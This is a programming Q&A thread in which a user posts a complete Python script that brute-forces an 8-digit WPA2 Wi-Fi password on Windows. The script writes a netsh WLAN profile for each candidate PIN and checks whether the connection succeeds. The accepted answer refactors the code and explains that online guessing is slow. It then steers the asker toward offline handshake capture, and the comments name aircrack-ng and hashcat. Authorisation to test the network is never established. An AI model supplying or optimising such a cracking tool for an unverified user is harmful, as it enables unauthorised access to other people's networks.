# Brute-force cracking a wireless network password

Tags: python, networking

I am working on my first brute force experiment and I modified code from [this SO post](https://stackoverflow.com/questions/63619312/how-to-brute-force-a-wifi-password-with-python) but it is kinda slow. Are there any improvements I can make to make it run faster?

What the code basically does is loop through a range of possible 8 numerical combinations and input every possibility to try and connect to a Wi-Fi network and check if the password worked. Is there any way I can optimize it?

```
from itertools import product
import re
import os
import subprocess

# function to establish a new connection
def createNewConnection(name, SSID, password):
    config = """<?xml version=\"1.0\"?>
            <WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
                <name>"""+name+"""</name>
                <SSIDConfig>
                    <SSID>
                        <name>"""+SSID+"""</name>
                    </SSID>
                </SSIDConfig>
                <connectionType>ESS</connectionType>
                <connectionMode>auto</connectionMode>
                <MSM>
                    <security>
                        <authEncryption>
                            <authentication>WPA2PSK</authentication>
                            <encryption>AES</encryption>
                            <useOneX>false</useOneX>
                        </authEncryption>
                        <sharedKey>
                            <keyType>passPhrase</keyType>
                            <protected>false</protected>
                            <keyMaterial>"""+password+"""</keyMaterial>
                        </sharedKey>
                    </security>
                </MSM>
            </WLANProfile>"""
    command = "netsh wlan add profile filename=\""+name+".xml\""+" interface=Wi-Fi"
    with open(name+".xml", 'w') as file:
        file.write(config)
    os.system(command)
 
# function to connect to a network   
def connect(name, SSID):
    command = "netsh wlan connect name=\""+name+"\" ssid=\""+SSID+"\" interface=Wi-Fi"
    os.system(command)
 
# function to display avavilabe Wifi networks   
def displayAvailableNetworks():
    command = "netsh wlan show networks interface=Wi-Fi"
    os.system(command)

displayAvailableNetworks()

name = input("Name of Wi-Fi: ")

def raid():
    chars = '0123456789'

    for length in range(8, 9): 
        to_attempt = product(chars, repeat=length)
        for attempt in to_attempt:
            print(''.join(attempt))
            createNewConnection(name, name, ''.join(attempt))
            connect(name, name) 
            try: 
                if re.sub(' +', ' ', subprocess.check_output("Netsh WLAN show interfaces").decode('utf-8').split("SSID",1)[1].split("BSSID")[0].replace(':', '').replace('\n', '')) == name:
                    print('connected to: ' + name)
                    print('The wifi password is: ' + ''.join(attempt))
                    break
            except Exception:
                print('Not connected')

raid()
```

Comment: *I came up with the following.* [Did you really?](https://stackoverflow.com/q/63619312/7867968)

Comment: The reason it's slow is because of what was detailed in that question (where it appears you copied this code from). You are generating 1 billion+ requests. Even if they took .1 second each, you're looking at ~3 years of waiting in the worst case scenario

Comment: @C.Nivs i worded it wrong what i meant is I found a similar method and made some changes to it.

Answer (score 5, accepted):

## String Formatting

You use a ton of string concatenation. Use `f-strings` if you are on python 3.6+:

```py
config = f"""<?xml version=\"1.0\"?>
            <WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
                <name>{name}</name>
                <SSIDConfig>
                    <SSID>
                        <name>{SSID}</name>
                    </SSID>
                </SSIDConfig>
                <connectionType>ESS</connectionType>
                <connectionMode>auto</connectionMode>
                <MSM>
                    <security>
                        <authEncryption>
                            <authentication>WPA2PSK</authentication>
                            <encryption>AES</encryption>
                            <useOneX>false</useOneX>
                        </authEncryption>
                        <sharedKey>
                            <keyType>passPhrase</keyType>
                            <protected>false</protected>
                            <keyMaterial>{password}</keyMaterial>
                        </sharedKey>
                    </security>
                </MSM>
            </WLANProfile>"""

with open(f"{name}.xml", 'w') as file:
```

## `os.system` vs. `subprocess`

`subprocess` is much more flexible than `os.system`. It has a `run` method for simple shell commands, but if you need control over the creation of a brand new shell process, `Popen` is extremely useful. The easiest way to [replace your `os.system` calls](https://docs.python.org/3/library/subprocess.html#replacing-os-system) is with the equivalent `subprocess.call` method:

```py
# this
def connect(name, SSID):
    command = f'netsh wlan connect name="{name}" ssid="{SSID}" interface=Wi-Fi'
    os.system(command)

# becomes this
def connect(name, SSID):
    # I've also replaced the double quotes to avoid escaping
    command = f'netsh wlan connect name="{name}" ssid="{SSID}" interface=Wi-Fi'
    _ = subprocess.call(command, shell=True)
```

## Naming

Function names, like variable names, should be `snake_case`:

```py
# this
displayAvailableNetworks

# should be this
display_available_networks
```

## Long Lines

I hope to never have to maintain a single line like this:

```py
if re.sub(' +', ' ', subprocess.check_output("Netsh WLAN show interfaces").decode('utf-8').split("SSID",1)[1].split("BSSID")[0].replace(':', '').replace('\n', '')) == name:
```

Let's break it up.

```py
_, ssid = (
    subprocess
    .check_output("Netsh WLAN show interfaces")
    .decode('utf-8')
    .split("SSID",1)
)

bssid, _ = ssid.split("BSSID", 1)

network_name = re.sub(
    ' +', 
    ' ', 
    bssid.replace(':', '').replace('\n', '')
)

if network_name == name:
    # rest of code
```

The makes it easier to read what's going on.

## Why is it slow?

Because you are doing a *ton* of attempts to connect to a wifi router. Just running the following code:

```bash
python -m timeit -s 'from string import digits; from itertools import product' 'sum(1 for _ in product(digits, repeat=8))'
```

Results in

```
1 loop, best of 5: 3.68 sec per loop
```

Or ~22s total. And that's the *shorter* set of permutations with no network calls. No matter how we improve the time spent concatenating strings or generating permutations, you are generating ~1,000,000,000 network calls worst-case. That is going to take a long time. For reference, 1 billion seconds is nearly 32 years.

If you *really* want to crack a password, the best way is to capture an authentication or handshake packet from a connecting device. This way, you are comparing generated passwords with that local packet. This eliminates the network call requirement, vastly increasing speed. There are plenty of tools and tutorials for this elsewhere, so I won't write one here.

Since the code originates from [this question](https://stackoverflow.com/q/63619312/7867968), check the answers there.

Comment: Thanks nice explanation! Does hashcat have the ability to capture a handshake key? Or should I be using something like aircrack-ng to sniff packets on the local network and work from there?

Comment: I'm most familiar with aircrack-ng, which definitely has this capability. I'd consult the hashcat docs to see

Comment: do I have to purchase an external wifi adapter inorder to sniff packets with aircrack-ng I already have an intel wifi 6E AX211 wifi module on my laptop?

Comment: I don't think so